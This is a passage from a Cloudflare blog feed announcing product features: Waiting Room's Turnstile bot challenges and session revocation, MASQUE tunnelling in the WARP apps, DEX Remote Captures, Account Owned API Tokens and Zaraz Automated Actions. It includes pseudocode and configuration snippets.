    cookie = decryptCookie(headers['Cookie'])
}
if (!cookie) {
    analytics.turnstileChallenges++
    return await queuingPage(await estimateTimeRemaining(), { turnstileChallenge: true })
} else if (cookie.infiniteQueuing) {
    analytics.infiniteQueueRequests++
    return await queuingPage(fakeTimeRemaining())
} else if (cookie.accepted) {
    return await sendToOrigin()
} else {
    // run Waiting Room's distributed queuing logic to check whether
    // this user has made it to the front of the queue, but only after
    // the user has completed a Turnstile challenge and isn't in the
    // fake infinite queue
    const { letThrough, timeRemaining } = calculateQueuing(cookie)
    if (letThrough) {
        cookie.accepted = true
        response.headers['Set-Cookie'] = encryptCookie(cookie)
        return await sendToOrigin()
    } else {
        return await queuingPage(timeRemaining)
    }
}</code></pre>
            <p><sup><i>Approximate pseudocode for how we handle incoming requests when the infinite queue is enabled in the Waiting Room worker</i></sup></p><p>Thanks to the versatility of Turnstile, we only needed to rely on public Turnstile APIs to build this integration.</p><p>Adding Turnstile to Waiting Room is a proactive step in managing traffic that directly contributes to a smoother, faster experience for end users. Building on that efficiency, let’s dive into how you can add an additional layer of control to increase throughput and minimize wait times for your customers.</p>
    <div>
      <h3>Further improve wait times using session revocation</h3>
      <a href="#further-improve-wait-times-using-session-revocation">
        
      </a>
    </div>
    <p>We have talked extensively in a previous <a href="https://blog.cloudflare.com/building-waiting-room-on-workers-and-durable-objects/#how-does-the-waiting-room-work"><u>blog post</u></a> about how we queue users with respect to the current active users on the application and the defined limits, and, in the same <a href="https://blog.cloudflare.com/building-waiting-room-on-workers-and-durable-objects/#waiting-room-state"><u>blog post</u></a>, about the state and calculations we use to determine the total number of active users. Here is a quick summary for those who have not read that post:</p><p>When a user navigates to a page behind a waiting room, they receive a <a href="https://developers.cloudflare.com/waiting-room/reference/waiting-room-cookie/"><u>cookie</u></a> and are associated with a time period called a bucket. We use these buckets to track the number of users either waiting in the queue or accessing the application during that specific time period. Whenever a user makes a request, we move their session from their previous bucket to the latest bucket. Once a bucket is older than the configured session duration, we know that those user sessions are no longer valid (expired) and we can clean up those values. Thus, those user sessions expire, and new slots open for the next users to enter the application.</p><p>These buckets are aggregated at Cloudflare data centers and then globally via the internal state of the waiting room, which is structured as multiple <a href="https://en.wikipedia.org/wiki/Conflict-free_replicated_data_type"><u>CRDT</u></a> counters and registers. This allows us to merge the distributed state of the waiting room stored in multiple data centers into a single global state without conflicts.</p><p>To calculate the total active users on an application, we first merge the state from all data centers. Then, we sum the active users for all the buckets where a session can still be active.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/47yTgIvnWdYEcoOSoGPO8E/2989c82fcecd31ec22eb1384b0ff9e15/image7.png" />
          </figure><p>Because the Waiting Room runs on each user request, we do not explicitly know when a user has stopped accessing the application; we simply stop receiving requests from them. So, we must consider their session active, and count it toward the total active users, until it is older than the session duration limit. For waiting rooms configured with a high session duration, a user might visit the site only briefly but still contribute to the total active users count for up to the configured session duration after they have stopped accessing the application. This can cause decreased throughput and longer wait times for users in the queue.</p>
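The conflict-free merge described above can be illustrated with a minimal grow-only counter, sketched here for intuition (an assumption for illustration; Cloudflare's actual state combines several CRDT counters and registers with their own schema):

```javascript
// Minimal G-Counter sketch: each data center increments only its own slot,
// and merging takes the per-replica maximum, so states merged in any order
// (or repeatedly) converge to the same global value.
function increment(state, replica, n = 1) {
  return { ...state, [replica]: (state[replica] || 0) + n };
}

function merge(a, b) {
  const out = { ...a };
  for (const [replica, count] of Object.entries(b)) {
    out[replica] = Math.max(out[replica] || 0, count);
  }
  return out;
}

function totalActiveUsers(state) {
  return Object.values(state).reduce((sum, n) => sum + n, 0);
}
```

If one data center has counted 3 active users and another 2, merging their states in either order yields a global count of 5, and merging a state with itself changes nothing — which is what makes the aggregation safe to run concurrently across data centers.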
    <div>
      <h3>Introducing Session Revocation </h3>
      <a href="#introducing-session-revocation">
        
      </a>
    </div>
    <p>With the Session Revocation feature, we now allow origins to return a command to the waiting room via an HTTP header (<code>Cf-Waiting-Room-Command</code>) to notify the Waiting Room to revoke the user session associated with the current response. This command removes the current user’s session and decreases the number of total active users for the bucket the session was last tracked in. This allows origins to terminate a user’s session early without needing to wait for the session to expire naturally.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2THxw5YatXjjZ4GxTP793n/0536e1d0eb3166c94ccfb6c7dce4148a/image4.png" />
          </figure><p>This can improve the throughput of waiting rooms in front of applications that have a dynamic user flow, where the session duration is set very high to account for users who send infrequent requests to the application.</p><p>To set up session revocation in your waiting room, check the “Allow session termination via origin commands” box in the user session settings section of the configuration. You must also configure your origin to return the session revocation HTTP header (<code>Cf-Waiting-Room-Command: revoke</code>) on any response whose associated session you want revoked. For more information, refer to our <a href="https://developers.cloudflare.com/waiting-room/how-to/control-user-session/#revoke-a-users-session-using-origin-commands"><u>developer documentation</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4XXqREJAf1FwrDAFSUovJs/53cb8bd410647046b05ad6b8b6f9f277/image6.png" />
          </figure><p><sup><i>Enable session revocation in the user session settings configuration</i></sup></p><p>In Waiting Room Analytics, you can view the number of sessions revoked per minute: the <code>sessionsRevoked</code> field in the <a href="https://developers.cloudflare.com/analytics/graphql-api/"><u>analytics GraphQL API</u></a> counts how many sessions were revoked in each minute.</p><p>In summary, Waiting Room Turnstile Integration and Session Revocation work together to enhance both security and user experience. The addition of a Turnstile challenge in the Waiting Room helps identify and block bots, ensuring that legitimate users don’t face unnecessary delays. Meanwhile, the Session Revocation feature optimizes resource usage by allowing you to end user sessions after key actions, like completing a purchase, freeing up space for other users.</p><p>Together, these features increase throughput and reduce wait times, providing a faster, more efficient experience for your customers. For more information on these features, <a href="https://developers.cloudflare.com/waiting-room"><u>check out our developer documentation</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Waiting Room]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Application Services]]></category>
            <guid isPermaLink="false">48d5TNR7SLaks6NJ9LGb77</guid>
            <dc:creator>Rachel Wyatt </dc:creator>
            <dc:creator>Piper McCorkle</dc:creator>
            <dc:creator>Brad Swenson</dc:creator>
        </item>
        <item>
            <title><![CDATA[What’s new in Cloudflare: MASQUE now powers 1.1.1.1 & WARP apps, DEX now generally available with Remote Captures]]></title>
            <link>https://blog.cloudflare.com/masque-now-powers-1-1-1-1-and-warp-apps-dex-available-with-remote-captures/</link>
            <pubDate>Fri, 27 Dec 2024 14:00:00 GMT</pubDate>
            <description><![CDATA[ This roundup blog post shares the latest new features and capabilities at Cloudflare. ]]></description>
            <content:encoded><![CDATA[ <p>At Cloudflare, we are constantly innovating and launching new features and capabilities across our product portfolio. Today’s roundup blog post shares two exciting updates across our platform: our cross-platform <a href="https://www.cloudflare.com/en-gb/learning/dns/what-is-1.1.1.1/"><u>1.1.1.1</u></a> &amp; <a href="https://developers.cloudflare.com/warp-client/"><u>WARP</u></a> applications (consumer) and device agents (Zero Trust) now use <a href="https://blog.cloudflare.com/masque-building-a-new-protocol-into-cloudflare-warp/"><u>MASQUE</u></a>, a cutting-edge <a href="https://www.cloudflare.com/en-gb/learning/performance/what-is-http3/"><u>HTTP/3</u></a>-based protocol, to secure your Internet connection. Additionally, DEX is now generally available. </p>
    <div>
      <h2>Faster and more stable: our 1.1.1.1 &amp; WARP apps now use MASQUE by default</h2>
      <a href="#faster-and-more-stable-our-1-1-1-1-warp-apps-now-use-masque-by-default">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6CghJvmC5DBnhKLM36MY3O/ecf722a9d9b5a4e4a048afea06237749/image1.png" />
          </figure><p>We’re excited to announce that as of today, our cross-platform <a href="https://www.cloudflare.com/en-gb/learning/dns/what-is-1.1.1.1/"><u>1.1.1.1</u></a> &amp; <a href="https://developers.cloudflare.com/warp-client/"><u>WARP</u></a> apps now use <a href="https://blog.cloudflare.com/masque-building-a-new-protocol-into-cloudflare-warp/"><u>MASQUE</u></a>, a cutting-edge <a href="https://www.cloudflare.com/en-gb/learning/performance/what-is-http3/"><u>HTTP/3</u></a>-based protocol, to secure your Internet connection.</p><p>As a reminder, our 1.1.1.1 &amp; WARP apps have two main functions: send all DNS queries through 1.1.1.1, our privacy-preserving DNS resolver, and protect your device’s network traffic via WARP by creating a private and encrypted tunnel to the resources you’re accessing, preventing unwanted third parties or public Wi-Fi networks from snooping on your traffic.</p><p>There are many ways to encrypt and proxy Internet traffic — you may have heard of a few, such as IPSec, WireGuard, or OpenVPN. We considered many tradeoffs when choosing a protocol, but we believe MASQUE is the future of fast, secure, and stable Internet proxying: it aligns with our belief in building on top of open Internet standards, and we’ve deployed it successfully at scale for customers like <a href="https://blog.cloudflare.com/icloud-private-relay/"><u>iCloud Private Relay</u></a> and <a href="https://blog.cloudflare.com/cloudflare-now-powering-microsoft-edge-secure-network/"><u>Microsoft Edge Secure Network</u></a>.</p>
    <div>
      <h3>Why MASQUE?</h3>
      <a href="#why-masque">
        
      </a>
    </div>
    <p><a href="https://blog.cloudflare.com/masque-building-a-new-protocol-into-cloudflare-warp/"><b><u>MASQUE</u></b></a> is a modern framework for proxying traffic that allows a variety of application protocols, including HTTP/3, to utilize QUIC as their transport mechanism. That’s a lot of acronyms, so let's make sure those are clear. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6XkQ3rF8oo8JaG0Iujskia/6383b0c0bce36a94298960c163495843/image4.png" />
          </figure><p><a href="https://blog.cloudflare.com/quic-version-1-is-live-on-cloudflare/"><b><u>QUIC</u></b></a> is a general-purpose transport protocol and <a href="https://www.rfc-editor.org/rfc/rfc9000.html"><u>Internet standard</u></a> that operates on top of UDP (instead of TCP), is encrypted by default, and solves several performance issues that plagued its predecessors. <a href="https://www.cloudflare.com/en-gb/learning/performance/what-is-http3/"><b><u>HTTP/3</u></b></a> is the latest version of the HTTP protocol, defining the application-layer protocol that runs on top of QUIC as its transport mechanism. MASQUE is a set of mechanisms for tunneling traffic over HTTP. It extends the existing HTTP CONNECT model to allow tunneling UDP and IP traffic, which is especially efficient when combined with QUIC’s <a href="https://datatracker.ietf.org/doc/html/rfc9221"><u>unreliable datagram extension</u></a>.</p><p>For example, we can use MASQUE’s <a href="https://www.rfc-editor.org/rfc/rfc9484.html"><u>CONNECT-IP method</u></a> to establish a tunnel that can send multiple concurrent requests over a single QUIC connection:</p>
            <pre><code>HEADERS
:method = CONNECT
:protocol = connect-ip
:scheme = https
:path = /.well-known/masque/ip/*/*/
:authority = example.org
capsule-protocol = ?1</code></pre>
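<p>The <code>:path</code> above is the expansion of the RFC 9484 URI template, where the two wildcard segments stand for the target host and IP protocol number. A small illustration (the template shape comes from the RFC; this helper function is purely hypothetical):</p>

```javascript
// Expand the well-known CONNECT-IP path template from RFC 9484:
// /.well-known/masque/ip/{target}/{ipproto}/
// Using "*" for both segments (as in the request above) asks for
// full-tunnel forwarding: any target host, any IP protocol.
function connectIpPath(target = "*", ipproto = "*") {
  return `/.well-known/masque/ip/${encodeURIComponent(target)}/${encodeURIComponent(ipproto)}/`;
}
```

<p>A client could instead scope the tunnel, e.g. <code>connectIpPath("192.0.2.1", "17")</code> to proxy only UDP to a single host.</p>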
            <p>The benefit these protocols bring to the quality and security of everyone’s Internet browsing experience is real. Earlier transport protocols were built before the advent of smartphones and mobile networks, so QUIC was designed to support a mobile world, maintaining connections even in poorly connected networks, and minimizing disruptions as people switch rapidly between networks as they move through their day. Leveraging HTTP/3 as the application layer means that MASQUE looks more like “normal” HTTP traffic on the Internet: it is easier to support, compatible with existing firewall and security rules, and supports cryptographic agility (i.e. support for <a href="https://blog.cloudflare.com/post-quantum-for-all/"><u>post-quantum crypto</u></a>), making this traffic more secure and resilient in the long term.</p>
    <div>
      <h3>Get started now </h3>
      <a href="#get-started-now">
        
      </a>
    </div>
    <p>All new installations of our 1.1.1.1 &amp; WARP apps support MASQUE, including iOS, Android, macOS, Windows, and Linux, and we’ve started to roll it out as the preferred protocol over WireGuard. <a href="https://developers.cloudflare.com/warp-client/get-started/"><u>On mobile</u></a>, to check if your connection is already secured over MASQUE, or change your device’s default option, you can toggle this setting via <i>Advanced &gt; Connection options &gt; Tunnel protocol:</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3c7lAh7C5huXDUYt4v7B7w/a089967f8d9d668b2ded321f40b35cf4/Screenshot_2024-12-23_at_18.26.20.png" />
          </figure><p><sup><i>Protocol connection options shown here on the iOS app</i></sup></p><p>We offer the following options: </p><ul><li><p><b>Auto</b>: this allows the app to choose the protocol.</p></li><li><p><b>MASQUE</b>: always use MASQUE to secure your connection.</p></li><li><p><b>WireGuard</b>: always use WireGuard to secure your connection.</p></li></ul><p>On <a href="https://developers.cloudflare.com/warp-client/get-started/linux/"><u>desktop</u></a> versions, you can switch the protocol by using the WARP command-line interface. For example:</p>
            <pre><code>warp-cli tunnel protocol set WireGuard
warp-cli tunnel protocol set MASQUE</code></pre>
            <p>With this rollout, we're excited to see MASQUE deliver increased performance and stability to millions of users. Download <a href="https://one.one.one.one/"><u>one of the WARP apps</u></a> today!</p>
    <div>
      <h2>DEX now Generally Available: Announcing detailed device visibility with DEX Remote Captures</h2>
      <a href="#dex-now-generally-available-announcing-detailed-device-visibility-with-dex-remote-captures">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2RkuqjgXZh8tmoj4W1narK/baaf61dcde00bbfa4cef71e5dbd2cc23/image2.png" />
          </figure><p><i>Following the successful beta launch of Digital Experience Monitoring (DEX), we are thrilled to announce the general availability of DEX, along with new Remote Captures functionality.</i></p><p>In today's hyper-distributed environment, user experience is paramount. Recurring performance problems can lead to decreased user satisfaction, lost productivity, and damaged brand reputation. <a href="https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/"><u>Digital Experience Monitoring (DEX)</u></a> offers a comprehensive solution to these challenges. Previous blog posts have discussed the solution and its capabilities. (<a href="https://blog.cloudflare.com/introducing-digital-experience-monitoring/"><i><u>Introducing Digital Experience Monitoring</u></i></a><i>, </i><a href="https://blog.cloudflare.com/digital-experience-monitoring-beta/"><i><u>Understanding end user-connectivity and performance with Digital Experience Monitoring, now available in beta</u></i></a><i>, </i><a href="https://blog.cloudflare.com/tag/dex"><i><u>What's new in Cloudflare One: Digital Experience monitoring notifications</u></i></a>)</p>
    <div>
      <h3>Introducing Remote Captures: PCAP and WARP Diag</h3>
      <a href="#introducing-remote-captures-pcap-and-warp-diag">
        
      </a>
    </div>
    <p>Imagine this: an end user is frustrated with a slow application, and your IT team is struggling to pinpoint the root cause. Traditionally, troubleshooting such issues involved contacting the end user and asking them to manually collect and share network traffic data. This process is time-consuming, prone to errors, and often disruptive to the end user's workflow.</p><p>Building upon the capabilities of DEX, we are excited to introduce Remote Captures, a powerful new feature that empowers IT admins to remotely initiate network <a href="https://en.wikipedia.org/wiki/Pcap"><u>packet captures (PCAP)</u></a> and <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/troubleshooting/warp-logs/"><u>WARP Diag logs</u></a> directly from your end users’ devices, capturing diagnostic information automatically from our device client. This streamlined approach accelerates troubleshooting, reduces the burden on end users, and provides valuable insights into network performance and security.</p>
    <div>
      <h3>Why Remote Captures?</h3>
      <a href="#why-remote-captures">
        
      </a>
    </div>
    <p>Remote Captures offer several key advantages. By analyzing detailed network traffic, IT teams can quickly pinpoint the root cause of network issues. Furthermore, granular network data empowers security teams to proactively detect and investigate potential threats. Finally, by identifying bottlenecks and latency issues, Remote Captures enable organizations to optimize network performance for a smoother user experience.</p>
    <div>
      <h3>How Remote Captures work</h3>
      <a href="#how-remote-captures-work">
        
      </a>
    </div>
    <p>Initiating a Remote Capture is straightforward. First, select the specific device you wish to troubleshoot. Then, with a few simple clicks, start capturing network traffic and/or WARP Diag data. Once the capture is complete, download the captured data and utilize your preferred tools for in-depth analysis.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5NWQAhlUK8OQvuydQV0lb7/d93f6792e897120aa5e2f837a6ec7786/image3.png" />
          </figure>
    <div>
      <h3>Get started today</h3>
      <a href="#get-started-today">
        
      </a>
    </div>
    <p>DEX Remote Captures are now available for Cloudflare One customers. They can be configured by going to <a href="https://dash.cloudflare.com/"><u>Cloudflare Dashboard</u></a> &gt; Zero Trust &gt; DEX &gt; Remote Captures, and then selecting the device you wish to collect from. For more information, refer to <a href="https://developers.cloudflare.com/cloudflare-one/insights/dex/remote-captures/"><u>Remote captures</u></a>. This new capability highlights just one of the many ways our unified SASE platform helps organizations find and fix issues across their users’ devices and networks. <a href="https://dash.cloudflare.com/sign-up/teams"><u>Try it out now</u></a> using our free tier to get started.</p>
    <div>
      <h2>Never miss an update </h2>
      <a href="#never-miss-an-update">
        
      </a>
    </div>
    <p>We hope you enjoy reading our roundup blog posts as we continue to build and innovate. Stay tuned to the <a href="https://blog.cloudflare.com/"><u>Cloudflare Blog</u></a> for the latest news and updates.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[DEX]]></category>
            <category><![CDATA[1.1.1.1]]></category>
            <category><![CDATA[MASQUE]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">1zc4C9M6VIkj5TrfugGxum</guid>
            <dc:creator>Mari Galicer</dc:creator>
            <dc:creator>Guy Nir</dc:creator>
        </item>
        <item>
            <title><![CDATA[What’s new in Cloudflare: Account Owned Tokens and Zaraz Automated Actions]]></title>
            <link>https://blog.cloudflare.com/account-owned-tokens-automated-actions-zaraz/</link>
            <pubDate>Thu, 14 Nov 2024 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare customers can now create Account Owned Tokens, allowing more flexibility around access control for their Cloudflare services. Additionally, Zaraz Automated Actions streamlines event tracking and third-party tool integration. ]]></description>
            <content:encoded><![CDATA[ <p>In October 2024, we started publishing roundup blog posts to share the latest features and updates from our teams. Today, we are announcing general availability for Account Owned Tokens, which allow organizations to improve access control for their Cloudflare services. Additionally, we are launching Zaraz Automated Actions, a new feature that streamlines event tracking and tool integration when setting up third-party tools. By automating common actions like pageviews, custom events, and e-commerce tracking, it removes the need for manual configuration.</p>
    <div>
      <h2>Improving access control for Cloudflare services with Account Owned Tokens</h2>
      <a href="#improving-access-control-for-cloudflare-services-with-account-owned-tokens">
        
      </a>
    </div>
    <p>Cloudflare is critical infrastructure for the Internet, and we understand that many of the organizations that build on Cloudflare rely on apps and integrations outside the platform to make their lives easier. To access Cloudflare resources, these apps and integrations interact with Cloudflare via our API, enabled by access tokens and API keys. Today, API Access Tokens and API keys on the Cloudflare platform are owned by individual users, which makes it difficult to represent services and adds a dependency on managing users alongside token permissions.</p>
    <div>
      <h3>What’s new about Account Owned Tokens</h3>
      <a href="#whats-new-about-account-owned-tokens">
        
      </a>
    </div>
    <p>First, a quick explanation, because the terms can be confusing. On Cloudflare, we have both Users and Accounts, and they mean different things, but sometimes look similar. Users are people, and they sign in with an email address. Accounts are not people; they are the top-level bucket we use to organize all the resources you use on Cloudflare. Accounts can have many users, and that’s how we enable collaboration. If you use Cloudflare for your personal projects, both your User and Account might have your email address as the name, but if you use Cloudflare as a company, the difference is more apparent: your user is “<a><u>joe.smith@example.com</u></a>” and the account might be “Example Company”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5tcNkxDjYz9jAXnfV0bPON/920a9dade7145de2adee21afa43d786e/image13.jpg" />
          </figure><p>Account Owned Tokens are not confined by the permissions of the creating user (e.g. a user can never make a token that can edit a field that they otherwise couldn’t edit themselves) and are scoped to the account they are owned by. This means that instead of creating a token belonging to the user “<a><u>joe.smith@example.com</u></a>”, you can now create a token belonging to the account “Example Company”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ibh4sT2wgVLVTgqgv2rtO/eb972a5b1c5fa0f70471631430a8ff91/image8.jpg" />
          </figure><p>The ability to make these tokens owned by the account instead of the user allows more flexibility to represent what the access is actually for.</p><p>Prior to Account Owned Tokens, a customer would need a user (<a><u>joe.smith@example.com</u></a>) to create a token for, say, a compliance workflow that pulls the list of Cloudflare zones on the account and verifies their security settings. All of the actions this compliance workflow performs are then attributed to joe.smith, and if joe.smith leaves the company and his permissions are revoked, the compliance workflow fails.</p><p>With this new release, an Account Owned Token could be created, named “compliance workflow”, with permissions to do this operation independently of <a><u>joe.smith@example.com</u></a>. All actions this token performs are attributed to “compliance workflow”. This token is visible to, and manageable by, all the super administrators on your Cloudflare account. If joe.smith leaves the company, the access remains independent of that user, and all super administrators on the account can still see, edit, roll, and delete the token as needed.</p><p>Any long-running services or programs can be represented by these tokens, made visible (and manageable) by all super administrators in your Cloudflare account, and truly represent the service instead of the users managing it. Audit logs moving forward will record that a given token was used, and user access can be kept to a minimum.</p>
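<p>For illustration, such a compliance workflow might look like the following hedged sketch: it authenticates with a bearer credential (now an Account Owned Token named “compliance workflow” rather than joe.smith’s personal token) and flags zones failing an example check. The <code>always_use_https</code> setting is just one example rule; the endpoint paths follow the standard Cloudflare v4 API.</p>

```javascript
const API = "https://api.cloudflare.com/client/v4";

// Pure helper: does a zone-setting response pass the example rule?
function passesCompliance(settingResponse) {
  return settingResponse?.result?.value === "on";
}

// Walk every zone on the account and collect the non-compliant ones.
// All API actions are attributed to the token, not to any individual user.
async function auditZones(token) {
  const headers = { Authorization: `Bearer ${token}` };
  const zones = await (await fetch(`${API}/zones`, { headers })).json();
  const failing = [];
  for (const zone of zones.result ?? []) {
    const setting = await (
      await fetch(`${API}/zones/${zone.id}/settings/always_use_https`, { headers })
    ).json();
    if (!passesCompliance(setting)) failing.push(zone.name);
  }
  return failing;
}
```

<p>If joe.smith leaves, the token (and this workflow) keeps working, and any super administrator can roll or delete it.</p>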
    <div>
      <h3>Getting started</h3>
      <a href="#getting-started">
        
      </a>
    </div>
    <p>Account Owned Tokens can be found on the new “API Tokens” tab under the “Manage Account” section of your Cloudflare dashboard, and any Super Administrator on your account can create, edit, roll, and delete these tokens. The API is the same, but at a new <code>/account/&lt;accountId&gt;/tokens</code> endpoint.</p>
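<p>For example, listing an account's tokens programmatically might look like this hedged sketch, assuming the public v4 base URL and an account-scoped tokens path; confirm the exact path shape against the API reference before relying on it.</p>

```javascript
const API = "https://api.cloudflare.com/client/v4";

// Build the account-scoped tokens URL (assumed path shape).
function accountTokensUrl(accountId) {
  return `${API}/accounts/${accountId}/tokens`;
}

// List the Account API Tokens for an account. The bearer credential
// used here must itself have permission to read account tokens.
async function listAccountTokens(accountId, bearer) {
  const resp = await fetch(accountTokensUrl(accountId), {
    headers: { Authorization: `Bearer ${bearer}` },
  });
  return (await resp.json()).result;
}
```
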
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/uZFVUp1RRP1NgZli9RAYN/5e2b90bea51b7b45bb25478120fd9024/Screenshot_2024-11-13_at_20.14.43.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1kiUi4lsJESJqr9HhgCS92/b4b0a3e955742346a5c945601fff4885/image3.png" />
          </figure>
    <div>
      <h3>Why/where should I use Account Owned Tokens?</h3>
      <a href="#why-where-should-i-use-account-owned-tokens">
        
      </a>
    </div>
    <p>There are a few places we would recommend replacing your User Owned Tokens with Account Owned Tokens:</p><p>1. <b>Long-running services that are managed by multiple people:</b> When multiple users all need to manage the same service, Account Owned Tokens can remove the bottleneck of requiring a single person to be responsible for all the edits, rotations, and deletions of the tokens. In addition, this guards against any user lifecycle events affecting the service. If the employee that owns the token for your service leaves the company, the service’s token will no longer be based on their permissions.</p><p>2. <b>Cloudflare accounts running any services that need attestable access records beyond user membership:</b> By restricting all of your users from being able to access the API, and consolidating all usable tokens to a single list at the account level, you can ensure that a complete list of all API access can be found in a single place on the dashboard, under “Account API Tokens”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2qtssh6bef5Ne6kugqUUnc/af11e3db733f4f38188988ac42034c26/image9.png" />
          </figure><p>3. <b>Anywhere you’ve created “Service Users”:</b> “Service Users”, or any identity that is meant to allow multiple people to access Cloudflare, are an active threat surface. They are generally highly privileged, and require additional controls (vaulting, password rotation, monitoring) to ensure non-repudiation and appropriate use. If these operations solely require API access, consolidating that access into an Account Owned Token is safe.</p>
    <div>
      <h3>Why/where should I use User Owned Tokens?</h3>
      <a href="#why-where-should-i-use-user-owned-tokens">
        
      </a>
    </div>
    <p>There are a few scenarios where you should continue to use User Owned Tokens:</p><ol><li><p><b>Where programmatic access is done by a single person at an external interface:</b> If a single user has an external interface using their own access privileges at Cloudflare, it still makes sense to use a personal token, so that information access can be traced back to them (e.g. using a personal token in a data visualization tool that pulls logs from Cloudflare).</p></li><li><p><a href="https://developers.cloudflare.com/api/operations/user-user-details"><b><u>User level operations</u></b></a><b>:</b> Any operations that act on your own user (e.g. email changes, password changes, user preferences) still require a user-level token.</p></li><li><p><b>Where you want to control resources over multiple accounts with the same credential:</b> As of November 2024, Account Owned Tokens are scoped to a single account. In 2025, we plan to support cross-account credentials; until then, anywhere that multiple accounts must be called in the same set of operations should still rely on API Tokens owned by a user.</p></li><li><p><b>Where we currently do not support a given endpoint:</b> We are currently working through a <a href="https://developers.cloudflare.com/fundamentals/api/get-started/account-owned-tokens/"><u>list of our services</u></a> to ensure that they all support Account Owned Tokens. When interacting programmatically with any service that is not yet supported, please continue to use User Owned Tokens.</p></li><li><p><b>Where you need to do token management programmatically:</b> If you are in an organization that needs to create and delete large numbers of tokens programmatically, please continue to use User Owned Tokens. In late 2024, watch for the “Create Additional Tokens” template on the Account Owned Tokens page; the token created from this template will allow for the management of additional tokens.</p></li></ol>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4BGL99WFnh4oOgTFhRY5N3/26bca9fa8851729d4128c2836db62c3c/image6.png" />
          </figure>
    <div>
      <h3>What does this mean for my existing tokens and programmatic access moving forward?</h3>
      <a href="#what-does-this-mean-for-my-existing-tokens-and-programmatic-access-moving-forward">
        
      </a>
    </div>
    <p>We do not plan to decommission User Owned Tokens, as they still have a place in our overall access model and are handy for ensuring user-centric workflows can be implemented.</p><p>As of November 2024, we’re still working to ensure that all of our endpoints work with Account Owned Tokens, and we expect to deliver additional token management improvements continuously, with an expected end date of Q3 2025 to cover all endpoints.</p><p>A list of services that do and do not support Account Owned Tokens can be found in our <a href="https://developers.cloudflare.com/fundamentals/api/get-started/account-owned-tokens/"><u>documentation</u></a>.</p>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>If Account Owned Tokens could provide value to you or your organization, documentation is available <a href="https://developers.cloudflare.com/fundamentals/api/get-started/account-owned-tokens/"><u>here</u></a>, and you can give them a try today from the “API Tokens” menu in your dashboard.</p>
    <div>
      <h2>Zaraz Automated Actions makes adding tools to your website a breeze</h2>
      <a href="#zaraz-automated-actions-makes-adding-tools-to-your-website-a-breeze">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5DkxlchIDUZbQ15x0H0usK/eb656617c1c83805bda98c7dfe896bda/image2.png" />
          </figure><p><a href="https://www.cloudflare.com/en-gb/application-services/products/zaraz/"><u>Cloudflare Zaraz</u></a> is a tool designed to manage and optimize third-party tools like analytics, marketing tags, or social media scripts on websites. By loading these third-party services through Cloudflare’s network, Zaraz improves website performance, security, and privacy. It ensures that these external scripts don't slow down page loading times or expose sensitive user data, handling them efficiently through Cloudflare's global network to reduce latency and improve the user experience.</p><p>Automated Actions are a new product feature that lets users easily set up pageview, custom event, and e-commerce tracking without the tedious process of manually configuring triggers and actions.</p>
    <div>
      <h3>Why we built Automated Actions</h3>
      <a href="#why-we-built-automated-actions">
        
      </a>
    </div>
    <p>An action in Zaraz is a way to tell a third-party tool that a user interaction or event has occurred when certain conditions, defined by <a href="https://developers.cloudflare.com/zaraz/custom-actions/create-trigger/"><u>triggers</u></a>, are met. You create actions from within the tools page, associating them with specific tools and triggers.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6a0xBA0uG55z4mhVkN0aYl/10101523491c68e4f2eec022737d15d4/image12.png" />
          </figure><p>Setting up a tool in Zaraz has always involved a few steps: <a href="https://developers.cloudflare.com/zaraz/custom-actions/create-trigger/"><u>configuring a trigger</u></a>, <a href="https://developers.cloudflare.com/zaraz/custom-actions/create-action/"><u>linking it to a tool action</u></a> and finally calling <a href="https://developers.cloudflare.com/zaraz/web-api/track/"><code><u>zaraz.track()</u></code></a>. This process allowed advanced configurations with complex rules, and while it was powerful, it occasionally left users confused — why isn’t calling <code>zaraz.track()</code> enough? We heard your feedback, and we’re excited to introduce <b>Zaraz Automated Actions</b>, a feature designed to make Zaraz easier to use by reducing the amount of work needed to configure a tool.</p><p>With Zaraz Automated Actions, you can now automate sending data to your third-party tools without the need to create a manual configuration. Inspired by the simplicity of <a href="https://developers.cloudflare.com/zaraz/web-api/ecommerce/"><code><u>zaraz.ecommerce()</u></code></a>, we’ve extended this ease to all Zaraz events, removing the need for manual trigger and action setup. For example, calling <code>zaraz.track('myEvent')</code> will send your event to the tool without the need to configure any triggers or actions.</p>
    <div>
      <h3>Getting started with Automated Actions</h3>
      <a href="#getting-started-with-automated-actions">
        
      </a>
    </div>
    <p>When adding a new tool in Zaraz, you’ll now see an additional step where you can choose one of three Automated Actions: <b>pageviews</b>, <b>all other events</b>, or <b>ecommerce</b>. These options allow you to specify what kind of events you want to automate for that tool.</p>
          <figure>
